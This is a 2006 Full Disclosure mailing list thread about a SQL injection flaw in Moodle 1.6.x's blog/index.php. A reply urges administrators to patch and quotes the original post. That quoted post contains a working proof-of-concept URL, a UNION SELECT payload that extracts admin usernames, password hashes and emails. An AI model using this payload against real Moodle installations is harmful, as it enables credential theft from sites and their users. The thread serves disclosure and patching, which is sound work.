Full Disclosure mailing list archives
Re: SQL injection - moodle
From: "scsantos@unigranrio com br" <scsantos () unigranrio com br>
Date: Mon, 09 Oct 2006 07:47:18 -0300
A security vulnerability was recently discovered in all versions of Moodle 1.6 and later that allows SQL injection. A quick one-line fix has already been added to CVS to patch this problem for 1.6.x and 1.7 versions. Update your servers using CVS as soon as possible, or edit the file blog/index.php in your copy manually as described here: http://cvs.moodle.com/blog/index.php?r1=1.18.2.2&r2=1.18.2.3 Att, Silvio Cesar L. dos Santos Analista de Redes Pleno DTI - Divisão de Tecnologia da Informação UNIGRANRIO - Universidade do Grande Rio +55 21 2672-7720 silviocesar () unigranrio edu br scsantos () unigranrio com br http://www.unigranrio.br disfigure wrote:
/****************************************/ http://www.w4cking.com Product: moodle 1.6.2 http://www.moodle.org Vulnerability: SQL injection Notes: - SQL injection can be used to obtain password hash - the moodle blog "module" must be enabled - guest access to the blog must be enabled POC: <target>/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271 Original advisory (requires registration): http://w4ck1ng.com/board/showthread.php?t=1305 /****************************************/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- SQL injection - moodle disfigure (Oct 08)
- Re: SQL injection - moodle scsantos@unigranrio com br (Oct 09)